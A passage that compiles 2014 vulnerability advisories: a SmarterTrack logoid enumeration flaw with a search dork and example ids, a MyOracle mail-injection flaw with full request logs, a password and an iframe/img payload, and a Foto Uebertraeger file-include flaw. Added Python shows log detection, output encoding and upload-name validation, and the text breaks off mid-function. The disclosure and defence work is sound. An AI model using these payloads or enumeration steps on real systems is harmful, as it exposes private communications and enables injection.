This is a fine example of developers being lazy and how not to implement "security".

National Express are one of the biggest public transport companies in the UK with a huge fleet of coaches and trains.

This vulnerability discloses customers' information to a potential attacker: the passengers' names, the destination, the last four digits of the payment card, the price the customer paid for the tickets and of course the ticket itself.


more here...........http://www.ifc0nfig.com/national-express-ticket-disclosure/

SmarterTools Smarter Track 6-10 - Information Disclosure Vulnerability

Document Title:
===============
SmarterTools Smarter Track 6-10 - Information Disclosure Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1298

Tracking ID: 088-1B879F0C-0A22


Release Date:
=============
2014-09-22


Vulnerability Laboratory ID (VL-ID):
====================================
1298


Common Vulnerability Scoring System:
====================================
6.1


Product & Service Introduction:
===============================
SmarterTrack is a powerful communications platform that acts as an online help desk for initiating, tracking, managing and reporting
on a number of different communication channels. Whether it is a ticket submission via email or from the online portal, a live chat,
a community post, comments made on a knowledge base article or more, SmarterTrack provides a centralized outlet for all communication
channels and is an ideal solution for building your online community.

( Copy of the Vendor Homepage: http://www.smartertools.com/smartertrack/help-desk-software.aspx )


Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory Researcher discovered an Information Disclosure issue in the official SmarterTools Smarter Track v6,v7,v8,v9 & v10.


Vulnerability Disclosure Timeline:
==================================
2014-08-23:     Researcher Notification & Coordination (Ehsan Vahab )
2014-08-23:     Vendor Notification (Smartertools Security Team)
2014-08-25:     Vendor Response/Feedback (Smartertools Security Team)
2014-09-21:     Vendor Fix/Patch Notification (Smartertools - Developer Team)
2014-09-22:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An information disclosure vulnerability has been discovered in the SmarterTrack v6, v7, v8, v9 and v10 web application.
The issue allows a remote attacker to gain unauthorized access to stored mail conversations.

The handler AvatarHandler.ashx returns an archive selected solely by the `logoid` query-string parameter. A remote attacker
only has to change the `logoid` value in the GET request to download a .zip file containing the .eml (mail message) file
of a conversation between a customer and the application owner, i.e. administrator or user messages. An invalid logoid
yields a 0-byte zip that cannot be downloaded, which makes valid ids easy to tell apart when the parameter is enumerated.

Exploitation of the vulnerability requires neither a privileged web application user account nor user interaction.
Successful exploitation results in unauthorized access to private support communication exchanged by email.

Request method(s):
                                [+] GET

Vulnerable File(s):
                                [+] AvatarHandler.ashx

Vulnerable Parameter(s):
                                [+] logoid


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privileged application user account and also without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Google Dork :
inurl:/kb/root.aspx

PoC :
smartertrack.localhost.com/AvatarHandler.ashx?logoid=[vulnerable number]

Wrong logoid:
http://support.xxx.com/AvatarHandler.ashx?logoid=182206

Correct logoid:
http://support.xxx.com/AvatarHandler.ashx?logoid=208758
http://support.xxx.com/AvatarHandler.ashx?logoid=208765
http://support.xxx.com/AvatarHandler.ashx?logoid=208766
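The PoC above is a plain insecure-direct-object-reference walk over `logoid`, and the advisory gives the one observable that separates a hit from a miss: a wrong id returns a 0-byte zip. That is enough to spot the enumeration in web-server logs. The following detection logic is an added example written for this page; it is neither SmarterTools code nor part of the original advisory. The log lines, client addresses, timestamps, ids and the `min_distinct`/`max_gap` thresholds are constructed for the demonstration, and the Combined Log Format is assumed.

```python
import re
from collections import defaultdict

# Constructed sample of access-log lines (Combined Log Format). They are
# not from a real SmarterTrack host: IPs, times and logoid values are
# invented. The response size mirrors the advisory's observation: a wrong
# logoid returns a 0-byte zip, a valid one returns a non-empty archive.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Sep/2014:10:01:01 +0000] "GET /AvatarHandler.ashx?logoid=208758 HTTP/1.1" 200 18342
203.0.113.7 - - [22/Sep/2014:10:01:02 +0000] "GET /AvatarHandler.ashx?logoid=208759 HTTP/1.1" 200 0
203.0.113.7 - - [22/Sep/2014:10:01:02 +0000] "GET /AvatarHandler.ashx?logoid=208760 HTTP/1.1" 200 0
203.0.113.7 - - [22/Sep/2014:10:01:03 +0000] "GET /AvatarHandler.ashx?logoid=208761 HTTP/1.1" 200 0
203.0.113.7 - - [22/Sep/2014:10:01:03 +0000] "GET /AvatarHandler.ashx?logoid=208765 HTTP/1.1" 200 20011
203.0.113.7 - - [22/Sep/2014:10:01:04 +0000] "GET /AvatarHandler.ashx?logoid=208766 HTTP/1.1" 200 17790
198.51.100.20 - - [22/Sep/2014:10:05:10 +0000] "GET /AvatarHandler.ashx?logoid=182206 HTTP/1.1" 200 0
198.51.100.20 - - [22/Sep/2014:10:05:11 +0000] "GET /kb/root.aspx HTTP/1.1" 200 5120
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)$'
)
LOGOID_RE = re.compile(r'/AvatarHandler\.ashx\?(?:.*&)?logoid=(\d+)', re.IGNORECASE)


def parse_line(line):
    """Return (ip, logoid, status, bytes) for an AvatarHandler request, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    lm = LOGOID_RE.search(m.group('path'))
    if not lm:
        return None
    size = 0 if m.group('bytes') == '-' else int(m.group('bytes'))
    return m.group('ip'), int(lm.group(1)), int(m.group('status')), size


def find_enumerators(log_text, min_distinct=4, max_gap=10):
    """Flag clients that walk through many distinct logoid values.

    A client is reported when it requested at least `min_distinct`
    different logoids and the sorted ids never differ by more than
    `max_gap`, the shape of a sequential enumeration rather than normal
    logo loading. Hits (non-empty body) and misses (0 bytes) are reported
    separately so the responder sees how many archives were actually read.
    """
    by_ip = defaultdict(dict)   # ip -> {logoid: largest response size}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, logoid, status, size = rec
        if status == 200:
            by_ip[ip][logoid] = max(size, by_ip[ip].get(logoid, 0))

    findings = {}
    for ip, ids in by_ip.items():
        if len(ids) < min_distinct:
            continue
        ordered = sorted(ids)
        gaps = [b - a for a, b in zip(ordered, ordered[1:])]
        if max(gaps) > max_gap:
            continue
        hits = sorted(i for i, n in ids.items() if n > 0)
        findings[ip] = {
            'distinct': len(ids),
            'hits': hits,
            'misses': len(ids) - len(hits),
        }
    return findings


if __name__ == '__main__':
    for ip, f in find_enumerators(SAMPLE_LOG).items():
        print(f"{ip}: {f['distinct']} logoids probed, "
              f"{len(f['hits'])} archives served {f['hits']}, {f['misses']} empty")
```

Run against the sample, the client at 203.0.113.7 is reported with six ids probed and three archives served; the single request from 198.51.100.20 stays below the threshold. On a real host, feed the server's own log and tune `max_gap` to the id spacing the help desk actually issues.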


Solution - Fix & Patch:
=======================
2014-09-21:     Vendor Fix/Patch Notification (Smartertools - Developer Team)


Security Risk:
==============
The security risk of the information disclosure issue is estimated as medium(+).


Credits & Authors:
==================
Ehsan Vahab (https://www.linkedin.com/profile/view?id=305567696)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

Oracle Corporation MyOracle - Persistent Vulnerability

Document Title:
===============
Oracle Corporation MyOracle - Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1261

Oracle Security ID (Team Tracking ID): admin@vulnerability-lab.com-001


Release Date:
=============
2014-09-17


Vulnerability Laboratory ID (VL-ID):
====================================
1261


Common Vulnerability Scoring System:
====================================
3.9


Product & Service Introduction:
===============================
Oracle Corporation is an American multinational computer technology corporation headquartered in Redwood City, California, United States.
The company specializes in developing and marketing computer hardware systems and enterprise software products – particularly its own brands
of database management systems. Oracle is the second-largest software maker by revenue, after Microsoft. The company also builds tools for
database development and systems of middle-tier software, enterprise resource planning (ERP) software, customer relationship management (CRM)
software and supply chain management (SCM) software. Larry Ellison, a co-founder of Oracle, has served as Oracle`s CEO throughout its history.
He also served as the Chairman of the Board until his replacement by Jeffrey O. Henley in 2004. On August 22, 2008, the Associated Press
ranked Ellison as the top-paid chief executive in the world.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Oracle_Corporation )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent vulnerability in the official Oracle Corporation `MyOracle` service web-application.


Vulnerability Disclosure Timeline:
==================================
2014-04-28: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-04-30: Vendor Notification (Oracle Sec Alert Security Team)
2014-05-03: Vendor Response/Feedback (Oracle Sec Alert Security Team)
2014-09-01: Vendor Fix/Patch (Oracle Developer Team - Acknowledgments 2014 October CPU Advisory)
2014-09-17: Public Disclosure (Vulnerability Laboratory)



Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation vulnerability (user data rendered unencoded in outgoing mail) has been discovered in the official Oracle Corporation `MyOracle` service web application.
The vulnerability allows an attacker to bypass the regular input validation and to inject script code into the emails sent by the account system's mail service.

The vulnerability is located in the name values of the MyOracle `registration` module. A remote attacker can submit script code in the first- and last-name input fields of the
registration form via a POST request. The registration triggers the account verification email, and that email carries the injected code unencoded in the message body, as the PoC
mail below shows. An attacker can therefore inject his own links or tokens or manipulate the whole mail body of a message that genuinely originates from Oracle's mail service;
because the mail goes to the address entered at registration, it can be directed at a third party. Other notification mails sent by the MyOracle service can be affected in the same
way, since outgoing mails are built from the stored profile values without encoding. The injection point is either a profile update or the registration itself. The security risk of
the persistent mail encoding and filter web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) score of 3.9.

Exploitation of the vulnerability requires low user interaction and no privileged application user account. Successful exploitation results in persistent session hijacking
attacks, unauthorized external redirects to malicious sources and persistent manipulation of the affected or connected module context.

Request Method(s):
                                [+] POST

Vulnerable Service(s):
                                [+] MyOracle

Vulnerable Module(s):
                                [+] Registration (exp.)

Vulnerable Parameter(s):
                                [+] Profile name values (firstname & lastname ...)


[Sender]:
                                [+] oracle-acct_ww@oracle.com

[Receiver]:
                                [+] admin@evolution-sec.com & bkm@evolution-sec.com


Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerability can be exploited by remote attackers with low user interaction and without privileged application user account.
For security demonstration or to reproduce the persistent mail encoding web vulnerability follow the provided information and steps below to continue.

Sender Mailbox - Main Oracle Server
oracle-acct_ww@oracle.com

Affected Mailbox - Receiver/Victim
admin@evolution-sec.com
bkm@evolution-sec.com


Inject via Profile (POST)
https://myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx?nextURL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=3


Inject via Registration (POST)
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2~656BF073~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


After Inject (REDIRECT OPTIONS)
https://myprofile.oracle.com/EndUser/faces/profile/notifyPage.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2~656BF073~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


-- PoC Session Logs [POST] ---

20:16:31.280[4105ms][total 4105ms] Status: 302[Moved Temporarily]
POST https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv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 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content size[720] Mime Type[text/html]
   Request Header:
      Host[myprofile.oracle.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv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
      Cookie[optimizelySegments=%7B%22174383146%22%3A%22ff%22%2C%22174203172%22%3A%22false%22%2C%22173164270%22%3A%22direct%22%7D; optimizelyEndUserId=oeu1398447211204r0.7026125166698021; optimizelyBuckets=%7B%7D; s_cc=true; s_fid=343B504EB719CF63-1174BEDEC7EE3C0B; s_nr=1398449779754; gpw_e24=https%3A%2F%2Fmyprofile.oracle.com%2FEndUser%2Ffaces%2Fprofile%2FcreateUser.jspx%3FnextURL%3Dhttps%253A%252F%252Flogin.oracle.com%252Fpls%252Forasso%252Forasso.wwsso_app_admin.ls_login%253FSite2pstoreToken%253Dv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s_sq=oracleglobal%3D%2526pid%253Dprofile%25253Aen-us%25253Acreate-user%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BTrPage._autoSubmit('f1'%25252C'usr_srv_otn'%25252Cevent%25252C1)%25253Breturntrue%25253B%25257D%2526oidt%253D2%2526ot%253DCHECKBOX; p_org_id=1001; p_lang=US; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=3; atgPlatoStop=1; BreadCrumb=%257BlevelName%253A%253A%253Cspan%2520style%253D%2522color%253ARED%253B%2520font-weight%253Abold%253B%2520font-size%253A11px%253B%2522%253EOracle%253C/span%253E%2520University%2520Home%2523%2523levelUrl%253A%253A/pls/web_prod-plq-dad/db_pages.getpage%253Fpage_id%253D3%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D; JSESSIONID=GBTGThlDQtGWmKXcVyTT5SF2LNBpRNGJ65Ls1KTZSjRf5rXvxm8L!1006513418!189473844; BIGipServermktap_myprofile_cache_pool=1729139341.26910.0000; notice_preferences=2:cb8350a2759273dccf1e483791e6f8fd; s_eVar21=CLD-hp-panel-build-business-intelligence]
      Connection[keep-alive]
   POST data:
      ops[Bitte+w%C3%A4hlen+Sie+...]
      drm[Sie+m%C3%BCssen+%7B0%7D+eingeben.]
      drsm[Sie+m%C3%BCssen+f%C3%BCr+%7B0%7D+mindestens+ein+Element+ausw%C3%A4hlen]
      err[FEHLER]
      reqd[Erforderliches+Feld.]
      lqws[https%3A%2F%2Floqate.oracle.com%2FLoqate%2FLoqate]
      unamefield[admin%40evolution-sec.com]
      passwd1[Keymaster148%21]
      passwd2[Keymaster148%21]
      givenname[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      middlename[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      sn[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      usr_jtitle[pentester]
      usr_ctry[41]
      usr_state[6]
      usr_cty[Kassel]
      companyname[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      usr_line1[bremerstrasse+1337]
      usr_line2[]
      usr_postal_code[34125]
      telephonenumber[573246234]
      usr_srv_otn[t]
      usr_srv_cio[t]
      usr_nsl_psn[t]
      org.apache.myfaces.trinidad.faces.FORM[f1]
      _noJavaScript[false]
      javax.faces.ViewState[%2118erzf7qoc]
      event[]
      source[cb1]
      partial[]
   Response Header:
      Location[https://myprofile.oracle.com/EndUser/faces/profile/notifyPage.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv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
      X-Frame-Options[sameorigin]
      Content-Type[text/html]
      Content-Language[en]
      Content-Encoding[gzip]
      Server[Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=122956956898568077,0)]
      Content-Length[720]
      Vary[Accept-Encoding]
      Date[Fri, 25 Apr 2014 18:16:45 GMT]
      Connection[keep-alive]






PoC: Exploit code in mail

<html><head>
<title>Bitte verifizieren Sie Ihren Oracle Account</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table class="header-part1" cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td><b>Betreff: </b>Bitte verifizieren Sie Ihren Oracle Account</td></tr><tr><td><b>Von: </b>oracle-acct_ww@oracle.com</td></tr><tr><td><b>Datum: </b>25.04.2014 20:16</td></tr></tbody></table><table class="header-part2" cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td><b>An: </b>admin@evolution-sec.com</td></tr></tbody></table><br>
<meta http-equiv="Content-Type" content="text/html; "><table cellpadding="0" cellspacing="0" align="center" border="0" width="640"><tbody><tr><td style="border-top:#CCCCCC solid 1px; border-right:#CCCCCC solid 1px; border-bottom:#CCCCCC solid 1px; border-left:#CCCCCC solid 1px; background-color:#FFFFFF;"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td style="background-color:#FF0000;"><a href="http://www.oracle.com" target="_blank"><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/302715.gif" alt="Oracle Corporation" border="0" height="30" hspace="12" width="123"></a></td></tr><tr><td style="padding:15 15 15 15; font-family:Arial, Helvetica, sans-serif; font-size:12px; color:#333333;">Sehr geehrte(r) "><iframe src="http://www.vulnerability-lab.com">%20"><img src="x">,<br><br>Bitte klicken Sie zum Bestätigen Ihres Accounts auf den folgenden Link. Der Link ist 5 Tage lang gültig.<br><br><a href="https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx?key=E28D4AFE3C2186C40C5E110F90FED0ADAE4262F73D46C4E7987F609FD0257E4AA51B6E896C85084916A06DF9F740618EAEE6EC45B3A302FAD49E2516B405A9FE"><font color="#FF0000">Link zur Accountverifizierung</font></a><br><br>Ihr Oracle Benutzername: admin@evolution-sec.com<br><br><b>Warum Email Verifizierung?</b><br><li>Schutz Ihrer Daten</li><li>Zugriff auf Oracle Anwendungen und Websites, die eine Verifizierung erfordern</li><br><br><b>Der Link zur Accountverifizierung funktioniert nicht?</b><br>Sollte der obige Link nicht funktionieren können Sie zur Verifizierung Ihrer Emailadresse auch die folgende URL kopieren und in Ihren Browser einfügen:<br><br>[https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx?key=E28D4AFE3C2186C40C5E110F90FED0ADAE4262F73D46C4E7987F609FD0257E4AA51B6E896C85084916A06DF9F740618EAEE6EC45B3A302FAD49E2516B405A9FE]<br><br><b>Sie wollen eine weitere Bestätigungsemail generieren?</b><br>1) <a 
href="https://myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx" target="_blank"><font color="#FF0000">Melden Sie sich bei Ihrem Account an.</font></a><br>2) Klicken Sie auf den Link "Account verifizieren" oder "Account erneut verifizieren". <br><br>Vielen Dank.<br>Das Oracle Account Team</font><br><br><hr style="color:#CCCCCC; height:1px;" /><strong>Richtlinien:</strong><br><font size="1">Bitte bedenken Sie, dass Ihre Nutzung der Oracle Websites und Services der <a href="http://www.oracle.com/us/legal/privacy/index.html" target="_blank"><font color="#FF0000">Oracle Datenschutzrichtlinie</font></a> und den <a href="http://www.oracle.com/us/legal/index.html" target="_blank"><font color="#FF0000">Servicebedingungen</font></a> unterliegt.<br><br>Verwaltung Ihres Benutzerkontos: Bitte aktualisieren Sie Ihre Emailadresse bei etwaigen Änderungen, damit wir Ihnen im Falle von Problemen mit dem Kontozugriff behilflich sein können. Melden Sie sich dafür zunächst an und klicken Sie dann auf den Link "Benutzernamen ändern" auf Ihrer Oracle Account-Seite.<br><br>Aktualisieren der Kommunikationseinstellungen für Ihre Emailadresse: Bitte melden Sie sich bei Ihrem Account an, um die Einstellungen der Kommunikationseinstellungen für Ihre Emailadresse zu aktualisieren.<br><br>Sie haben diese Email erhalten, da vor kurzem für diese Emailadresse ein Benutzerkonto auf der Oracle Website erstellt wurde. 
Wenn Sie in letzter Zeit kein Benutzerkonto auf der Oracle Website erstellt haben, <a href="http://apex.oracle.com/pls/otn/f?p=42988:3" target="_blank"><font color="#FF0000">senden</font></a> Sie uns eine Hilfsanfrage.<br><br>Bei Zugriffs- oder Anmeldeproblemen <a href="http://apex.oracle.com/pls/otn/f?p=42988:3:2527260596859682::NO:::" target="_blank"><font color="#FF0000">klicken Sie bitte hier</a>.</font><br></tr><tr><td style="padding:15 15 15 15; border-top:#CCCCCC solid 1px; border-bottom:#CCCCCC solid 1px;"><a href="http://www.oracle.com/us/corporate/index.html" target="_blank"><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/196263.gif" alt="Hardware and Software Engineered to Work Together" width="174" height="50" border="0" /></a></td></tr><tr><td><table width="100%" border="0" cellpadding="0" cellspacing="0"><tr><td height="25" style="padding:0 0 0 15;"><font face="Arial, Helvetica, sans-serif" size="1" color="#333333">Copyright 2014, Oracle. Alle Rechte vorbehalten.</font></td><td align="right" style="padding:0 15 0 0;"><font face="Arial, Helvetica, sans-serif" size="1" color="#333333"> <a href="http://www.oracle.com/de/corporate/contact/index.html" target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Kontakt</u></font></a> | <a href="http://www.oracle.com/us/legal/index.html" target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Rechtliche Hinweise und Nutzungsbedingungen</u></font></a> | <a href="http://www.oracle.com/us/legal/privacy/index.html" target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Datenschutz</u></font></a></font></td></tr></table></td></tr></table></td></tr></table></body></html>
</body>
</html>
</iframe></td></tr></tbody></table></td></tr></tbody></table></body></html>


Script Code Payload:
><iframe src="http://www.vulnerability-lab.com">%20"><img src="http://evolution-sec.com/sites/default/files/65-2_0.png">



Reference(s):
https://myprofile.oracle.com/
https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=x
https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken


Picture(s):
                                ../1.png
                                ../2.png
                                ../3.png


Resource(s):
                                ../Account verifizieren.htm
                                ../Bitte verifizieren Sie Ihren Oracle Account.html
                                ../Bitte verifizieren Sie Ihren Oracle Account_poc.html
                                ../poc.txt


Solution - Fix & Patch:
=======================
The vulnerability can be patched by validating the first- and last-name input fields (and the other profile name values) on input in the MyOracle registration and profile update forms,
and by HTML-encoding the stored profile values at the moment the account service places them into a notification mail template. Stored profile data must be treated as untrusted whenever
a service mail is generated, whichever sender address the mail is sent from.
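The fix comes down to encoding at the point where the stored name meets the mail template, and to having a check that proves the rendered mail contains no markup the template did not put there. The following is an added example written for this page, not Oracle's code and not part of the original advisory. The template text and the verification link are constructed; the payload shape is the one from the PoC above.

```python
import html
from html.parser import HTMLParser

# Verification-mail template constructed for this example. Oracle's real
# template is not reproduced; only the shape matters: a greeting that
# interpolates the user-supplied name into HTML.
TEMPLATE = (
    '<p>Dear {name},</p>'
    '<p>Please click the following link to verify your account:</p>'
    '<p><a href="{link}">Account verification link</a></p>'
)

# Payload shape from the advisory: closes the surrounding context and
# opens an iframe, then an img.
PAYLOAD = '"><iframe src="http://www.vulnerability-lab.com">%20"><img src="x">'


def render_mail_unsafe(name, link):
    """Interpolates the stored name as-is: the injection lands in the mail."""
    return TEMPLATE.format(name=name, link=link)


def render_mail_safe(name, link):
    """Encodes the name for an HTML text context at the moment it enters the
    template. The link is encoded too, since it lands in an attribute value."""
    return TEMPLATE.format(name=html.escape(name, quote=True),
                           link=html.escape(link, quote=True))


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(document):
    """Start tags an HTML parser sees in the document, i.e. what a mail client
    would act on. The same check can run in a unit test or a mail gateway."""
    p = _TagCollector()
    p.feed(document)
    return p.tags


# Tags the template legitimately emits (rendered with harmless values).
TEMPLATE_TAGS = set(tags_in(TEMPLATE.format(name='x', link='x')))


def foreign_tags(document):
    """Tags in a rendered mail that the template never produces: a non-empty
    result means user data was rendered as markup."""
    return [t for t in tags_in(document) if t not in TEMPLATE_TAGS]


if __name__ == '__main__':
    link = 'https://example.invalid/verify?key=abc'   # constructed link
    print('unsafe:', foreign_tags(render_mail_unsafe(PAYLOAD, link)))
    print('safe:  ', foreign_tags(render_mail_safe(PAYLOAD, link)))
```

The unsafe renderer yields `iframe` and `img` as foreign tags, the safe one yields none while the displayed name still reads as the literal characters the user typed. Context matters: `html.escape` is right for text and quoted attribute values, but a name that ends up inside a `href` or a `<script>` block needs the encoding of that context instead.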


Security Risk:
==============
The security risk of the persistent mail encoding web vulnerability in the myoracle account system web-server is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]



GS Foto Uebertraeger v3.0 iOS - File Include Vulnerability

Document Title:
===============
GS Foto Uebertraeger v3.0 iOS - File Include Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1325


Release Date:
=============
2014-09-22


Vulnerability Laboratory ID (VL-ID):
====================================
1325


Common Vulnerability Scoring System:
====================================
6.3


Product & Service Introduction:
===============================
The best Photo Transfer app on the App Store! Photo Transfer allows you to quickly transfer photos between your iPhone,
iPad, PC or Mac using your local Wi-Fi network, without any 3rd party transfer utilities. It can easily access your photo
libraries via Wi-Fi from any computer with a web browser (IE/Chrome/Safari) on the same Wi-Fi network, very easy to use!

(Copy of the Homepage: https://itunes.apple.com/en/app/wifi-fotos-ubertrager-+-uber/id902267412 )



Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a file include vulnerability in the official Golden Soft Photo/Foto Uebertraeger v3.0 iOS mobile application.


Vulnerability Disclosure Timeline:
==================================
2014-09-22: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Golden Soft
Product: Foto Überträger - iOS Mobile Web Application 3.0


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Golden Soft Foto Überträger v3.0 iOS mobile Wi-Fi web application.
The vulnerability allows attackers on the same Wi-Fi network to include local file/path requests or system-specific path commands
without authorization and to compromise the mobile web application.

The vulnerability is located in the `filename` and `albumname` values of the `uploadPhotoPost` module. Attackers are able to upload files with
malicious `filename` or `albumname` values in the `uploadPhotoPost` POST request to compromise the mobile web application. The injected file/path
value takes effect in the index directory listing of the Wi-Fi interface, where the uploaded name is rendered unescaped inside the album-title markup
(see the PoC). The attacker reaches the vulnerable upload request through the Wi-Fi interface of the application.

Attackers are also able to combine the filename/albumname validation issue with persistently injected script code to mount further local malicious
requests. The attack vector is on the application side of the Wi-Fi service and the request method used to inject is POST.

The security risk of the local file include web vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) score of 6.3.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web application user account. Successful exploitation
of the local file include web vulnerability results in mobile application or connected device component compromise.
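Both halves of the issue above, a path-carrying upload name and that name echoed raw into the directory listing, are closed by the same small upload-handler routine: accept only a plain file name, prove the resolved storage path stays inside the album directory, and encode the name when the listing is rendered. The code below is an added example written for this page; it is not Golden Soft's code and not part of the original advisory. The allow-listed characters and extensions, the exception name and the `album_dir` layout are assumptions made for the demonstration.

```python
import html
import os
import re
import tempfile

# Allow-list for a stored photo or album name. Anything else is rejected
# rather than "cleaned", so a refused upload is visible to the user.
_NAME_RE = re.compile(r'^[A-Za-z0-9][A-Za-z0-9 ._-]{0,99}$')
_ALLOWED_EXT = {'.png', '.jpg', '.jpeg', '.gif', '.heic'}   # assumed set


class BadFilename(ValueError):
    """Raised for any upload name that is not a plain, allow-listed file name."""


def validate_name(name):
    """Return the name unchanged or raise BadFilename.

    Rejects anything carrying a path component ("./x.png", "../x.png",
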